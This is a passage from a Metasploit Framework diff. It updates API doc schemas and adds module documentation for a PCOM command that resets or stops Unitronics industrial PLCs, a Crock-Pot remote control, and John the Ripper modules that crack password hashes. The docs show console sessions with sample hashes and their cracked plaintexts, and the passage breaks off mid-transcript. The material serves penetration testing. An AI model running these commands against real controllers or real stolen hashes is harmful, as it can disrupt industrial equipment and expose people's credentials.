    property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
-    property :data, type: :string, description: DATA_DESC
+    property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
    property :content_type, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
    property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE
    property :info, type: :string, description: INFO_DESC
@@ -87,8 +91,8 @@ module LootApiDoc
          property :host, type: :string, format: :ipv4, description: HOST_DESC, example: RootApiDoc::HOST_EXAMPLE
          property :service,  '$ref': :Service
          property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
-          property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE, required: true
-          property :data, type: :string, description: DATA_DESC
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
+          property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
          property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
          property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
          property :info, type: :string, description: INFO_DESC
@@ -206,7 +210,14 @@ module LootApiDoc
        key :description, 'The updated attributes to overwrite to the loot.'
        key :required, true
        schema do
-          key :'$ref', :Loot
+          property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_DESC, example: RootApiDoc::WORKSPACE_POST_EXAMPLE
+          property :host_id, type: :integer, format: :int32, description: HOST_ID_DESC
+          property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
+          property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
+          property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
+          property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
+          property :info, type: :string, description: INFO_DESC
        end
      end

@@ -15,8 +15,6 @@ module ModuleSearchApiDoc
  DISCLOSURE_DATE_DESC = 'Filter modules with a matching disclosure date.'
  DATE_DESC = 'Alias for \'disclosure_date\'.'
  FULL_NAME_DESC = 'Filter modules with a matching full name.'
-  IS_CLIENT_DESC = 'Filter modules that are client attacks. (Accepts strings \'true\' or \'false\').'
-  IS_SERVER_DESC = 'Filter modules that are server attacks. (Accepts strings \'true\' or \'false\').'
  IS_INSTALL_PATH_DESC = 'Filter modules that by value of \'is_install_path\'. (Accepts strings \'true\' or \'false\').'
  MOD_TIME_DESC = 'Filter modules with a matching modification time.'
  NAME_DESC = 'Filter modules with a matching descriptive name.'
@@ -34,7 +32,7 @@ module ModuleSearchApiDoc
  TARGETS_DESC = 'Alias for \'target\'.'
  TEXT_DESC = 'Filter modules matching any one of name, full name, description, reference, author, or targets.'
  TYPE_DESC = 'Filter modules with a matching type (exploit, auxiliary, payload, etc.).'
-  FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_client\', \'is_server\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
+  FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
  NOTES_DESC = 'Extra info for a module, such as AKA names or NOCVE explanations.'

  TYPE_ENUM = [
@@ -97,8 +95,6 @@ module ModuleSearchApiDoc
    property :description, type: :string, description: DESCRIPTION_DESC, example: DESCRIPTION_EXAMPLE
    property :author, description: AUTHOR_DESC, example: AUTHOR_EXAMPLE, type: :array do items type: :string end
    property :references, description: REFERENCE_DESC, example: REFERENCES_EXAMPLE, type: :array do items type: :string end
-    property :is_client, type: :boolean, description: IS_CLIENT_DESC, example: IS_CLIENT_EXAMPLE
-    property :is_server, type: :boolean, description: IS_SERVER_DESC, example: IS_SERVER_EXAMPLE
    property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
    property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
    property :rport, type: :string, description: PORT_DESC, example: RPORT_EXAMPLE
@@ -130,8 +126,6 @@ module ModuleSearchApiDoc
        :disclosure_date => DISCLOSURE_DATE_DESC,
        :date => DATE_DESC,
        :full_name => FULL_NAME_DESC,
-        :is_client => IS_CLIENT_DESC,
-        :is_server => IS_SERVER_DESC,
        :is_install_path => IS_INSTALL_PATH_DESC,
        :mod_time => MOD_TIME_DESC,
        :name => NAME_DESC,
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  Unitronics Vision PLCs
+
+## Verification Steps
+
+  1. Do: `use auxiliary/admin/scada/pcom_command`
+  2. Do: `set RHOST=IP` where IP is the IP address of the target
+  3. Do: `run` to send PCOM command
+
+ ## Scenarios
+
+   ```
+msf5 > use auxiliary/admin/scada/pcom_command
+msf5 auxiliary(admin/scada/pcom_command) > show options
+
+Module options (auxiliary/admin/scada/pcom_command):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   MODE    RESET            yes       PLC command (Accepted: START, STOP, RESET)
+   RHOST                    yes       The target address
+   RPORT   20256            yes       The target port (TCP)
+   UNITID  0                no        Unit ID (0 - 127)
+
+msf5 auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf5 auxiliary(admin/scada/pcom_command) > run
+
+[*] 192.168.1.1:20256 - Sending RESET command
+[*] 192.168.1.1:20256 - Command accepted
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/scada/pcom_command) >
+```
@@ -0,0 +1,60 @@
+## Intro
+
+This module acts as a simple remote control for Belkin Wemo-enabled
+Crock-Pots by implementing a subset of the functionality provided by the
+Wemo App.
+
+No vulnerabilities are exploited by this Metasploit module in any way.
+
+## Setup
+
+You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
+
+## Actions
+
+```
+Available actions:
+  Name  Description
+  ----  -----------
+  Cook  Cook stuff
+  Stop  Stop cooking
+```
+
+## Options
+
+**TEMP**
+
+Set this to the desired temperature for cooking. Valid values are `Off`,
+`Warm`, `Low`, and `High`.
+
+**TIME**
+
+Set this to the desired cook time in full minutes.
+
+**DefangedMode**
+
+Set this to `false` to disable defanged mode and enable module
+functionality. Set this only if you're SURE you want to proceed.
+
+## Usage
+
+```
+msf5 > use auxiliary/admin/wemo/crockpot
+msf5 auxiliary(admin/wemo/crockpot) > set rhosts 10.22.22.1
+rhosts => 10.22.22.1
+msf5 auxiliary(admin/wemo/crockpot) > set temp High
+temp => High
+msf5 auxiliary(admin/wemo/crockpot) > set time 1
+time => 1
+msf5 auxiliary(admin/wemo/crockpot) > set defangedmode false
+defangedmode => false
+msf5 auxiliary(admin/wemo/crockpot) > set verbose true
+verbose => true
+msf5 auxiliary(admin/wemo/crockpot) > run
+
+[+] Wemo-enabled Crock-Pot detected
+[*] Cooking on High for 1m
+[+] Cook time set to 1m
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/wemo/crockpot) >
+```
@@ -0,0 +1,180 @@
+## Vulnerable Application
+
+  This module applys a john the ripper (or hashcat) style .pot file to hashes in the database.
+  This will allow very fast cracking of all supported hash types which have already been cracked.
+
+## Verification Steps
+
+  1. Have at least one set of hashes in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/apply_pot```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+## Scenarios
+
+In this scenario, we fill a bunch of different hash types into the creds db.  You'll need a
+.pot file with the cracked hashes, the following can be used:
+
+```
+rEK1ecacw.7.c:password
+_J9..K0AyUubDrfOgO4s:password
+$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe:password
+yhMEAyLkfWqeQ:se
+$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/:password
+$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5:password
+$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1:password
+0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8:foo
+0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908:toto
+0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254:FOO
+0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16:Password1!
+445ff82636a7ba59:probe
+*5AD8F88516BD021DD43F171E2C785C69F8E54ADB:tere
+O$SIMON#4f8bc1809cb2af77:A
+O$SYSTEM#9eedfa0ad26c6d52:THALES
+8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A:epsilon
+$oracle12c$e3243b98974159cc24fd2c9a8b30ba62e0e83b6ca2fc7c55177c3a7f82602e3bdd17ceb9b9091cf9dad672b8be961a9eac4d344bdba878edc5dcb5899f689ebd8dd1be3f67bff9813a464382381ab36b:epsilon
+$dynamic_1034$be86a79bf2043622d58d5453c47d4860$HEX$24556578616d706c65:password
+$LM$ac404c4ba2c66533:ASE
+$LM$4a3b108f3fa6cb6d:D
+$LM$e52cac67419a9a22:PASSWOR
+$NT$8846f7eaee8fb117ad06bdd830b7586c:password
+```
+
+```
+resource (hashes_pot.rb)> creds -d
+Credentials
+===========
+
+host  origin  service  public  private  realm  private_type  JtR Format
+----  ------  -------  ------  -------  -----  ------------  ----------
+
+resource (hashes_pot.rb)> creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+resource (hashes_pot.rb)> creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+resource (hashes_pot.rb)> creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+resource (hashes_pot.rb)> creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
+resource (hashes_pot.rb)> creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
+resource (hashes_pot.rb)> creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+resource (hashes_pot.rb)> creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
+resource (hashes_pot.rb)> creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+resource (hashes_pot.rb)> creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+resource (hashes_pot.rb)> creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
+resource (hashes_pot.rb)> creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
+resource (hashes_pot.rb)> creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+resource (hashes_pot.rb)> creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+resource (hashes_pot.rb)> creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+resource (hashes_pot.rb)> creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+resource (hashes_pot.rb)> creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+resource (hashes_pot.rb)> creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+resource (hashes_pot.rb)> creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
+resource (hashes_pot.rb)> creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+resource (hashes_pot.rb)> use auxiliary/analyze/apply_pot
+resource (hashes_pot.rb)> run
+[*] Hashes Written out to /tmp/hashes_tmp20190203-16380-1974mdz
+[*] Checking bcrypt hashes against pot file
+[+] blowfish_password:password
+[*] Checking bsdicrypt hashes against pot file
+[+] bsdi_password:password
+[*] Checking crypt hashes against pot file
+Warning: hash encoding string length 46, type id $d
+appears to be unsupported on this system; will not load such hashes.
+[+] des_password:password
+[+] md5_password:password
+[+] sha256_password:password
+[+] sha512_password:password
+[*] Checking descrypt hashes against pot file
+[+] des_password:password
+[*] Checking lm hashes against pot file
+[+] lm_password:password
+[*] Checking nt hashes against pot file
+[+] lm_password:password
+[+] nt_password:password
+[*] Checking md5crypt hashes against pot file
+[+] md5_password:password
+[*] Checking mysql hashes against pot file
+[+] mysql_probe:probe
+[*] Checking mysql-sha1 hashes against pot file
+[+] mysql-sha1_tere:tere
+[*] Checking mssql hashes against pot file
+[+] mssql_foo:FOO
+[*] Checking mssql05 hashes against pot file
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[*] Checking mssql12 hashes against pot file
+[+] mssql12_Password1!:Password1!
+[*] Checking oracle hashes against pot file
+[+] simon:A
+[+] SYSTEM:THALES
+[*] Checking oracle11 hashes against pot file
+[+] DEMO:epsilon
+[+] oracle11_epsilon:epsilon
+[*] Checking oracle12c hashes against pot file
+[+] oracle12c_epsilon:epsilon
+[*] Checking dynamic_1506 hashes against pot file
+[*] Checking dynamic_1034 hashes against pot file
+[+] example:password
+[*] Auxiliary module execution completed
+resource (hashes_pot.rb)> creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       des_password        password                                                                                                                                                                                                                                                                     Password            
+                       des_password        rEK1ecacw.7.c                                                                                                                                                                                                                                                                Nonreplayable hash  des
+                       md5_password        password                                                                                                                                                                                                                                                                     Password            
+                       md5_password        $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                                                                                                                                                                                           Nonreplayable hash  md5
+                       bsdi_password       password                                                                                                                                                                                                                                                                     Password            
+                       bsdi_password       _J9..K0AyUubDrfOgO4s                                                                                                                                                                                                                                                         Nonreplayable hash  bsdi
+                       sha256_password     password                                                                                                                                                                                                                                                                     Password            
+                       sha256_password     $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                                                                                                                                                                                      Nonreplayable hash  sha256,crypt
+                       sha512_password     password                                                                                                                                                                                                                                                                     Password            
+                       sha512_password     $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1                                                                                                                                                                           Nonreplayable hash  sha512,crypt
+                       blowfish_password   password                                                                                                                                                                                                                                                                     Password            
+                       blowfish_password   $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                                                                                                                                                                                                 Nonreplayable hash  bf
+                       lm_password         password                                                                                                                                                                                                                                                                     Password            
+                       lm_password         e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c                                                                                                                                                                                                            NTLM hash           nt,lm
+                       nt_password         password                                                                                                                                                                                                                                                                     Password            
+                       nt_password         aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c                                                                                                                                                                                                            NTLM hash           nt,lm
+                       mssql05_toto        toto                                                                                                                                                                                                                                                                         Password            
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                                                                                                                                       Nonreplayable hash  mssql05
+                       mssql_foo           foo                                                                                                                                                                                                                                                                          Password            
+                       mssql_foo           FOO                                                                                                                                                                                                                                                                          Password            
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                                                                                                                                               Nonreplayable hash  mssql
+                       mssql12_Password1!  Password1!                                                                                                                                                                                                                                                                   Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16                                                                                                                               Nonreplayable hash  mssql12
+                       mysql_probe         probe                                                                                                                                                                                                                                                                        Password            
+                       mysql_probe         445ff82636a7ba59                                                                                                                                                                                                                                                             Nonreplayable hash  mysql
+                       mysql-sha1_tere     tere                                                                                                                                                                                                                                                                         Password            
+                       mysql-sha1_tere     *5AD8F88516BD021DD43F171E2C785C69F8E54ADB                                                                                                                                                                                                                                    Nonreplayable hash  mysql-sha1
+                       simon               A                                                                                                                                                                                                                                                                            Password            
+                       simon               4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM              THALES                                                                                                                                                                                                                                                                       Password            
+                       SYSTEM              9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO                epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO                S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon    epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon    S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon   H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+                       example             password                                                                                                                                                                                                                                                                     Password            
+                       example             md5be86a79bf2043622d58d5453c47d4860                                                                                                                                                                                                                                          Postgres md5        raw-md5,postgres
+```
@@ -0,0 +1,136 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
+  based password hashes, such as:
+
+  * `DES` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with a `des` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_aix```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
+```
+
+Crack them:
+
+```
+[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
+[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
+[*] Cracking descrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
+Session completed
+[*] Cracking descrypt hashes in single mode...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
+Session completed
+[*] Cracking descrypt hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
+Session completed
+[*] Cracked Passwords this run:
+[+] des_password:password
+[+] des_passphrase:????????se
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_aix) > creds
+Credentials
+===========
+
+host  origin  service  public          private                   realm  private_type        JtR Format
+----  ------  -------  ------          -------                   -----  ------------        ----------
+                       des_passphrase  ????????se                       Password            
+                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
+                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_password    password                         Password            
+
+```
@@ -0,0 +1,171 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
+  based password hashes, such as:
+
+  * `DES` based passwords  
+  * `MD5` based passwords
+  * `BSDi` based passwords
+  * With `crypt` set to `true`:
+    * `bf`, `bcrypt`, or `blowfish` based passwords
+    * `SHA256` based passwords
+    * `SHA512` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
+  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
+
+## Verification Steps
+
+  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_linux```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRYPT**
+
+   Include `blowfish` and `SHA`(256/512) passwords.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
+creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
+creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_linux 
+msf5 auxiliary(analyze/jtr_linux) > set crypt true
+crypt => true
+msf5 auxiliary(analyze/jtr_linux) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
+[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
+[*] Cracking md5crypt hashes in normal wordlist mode...
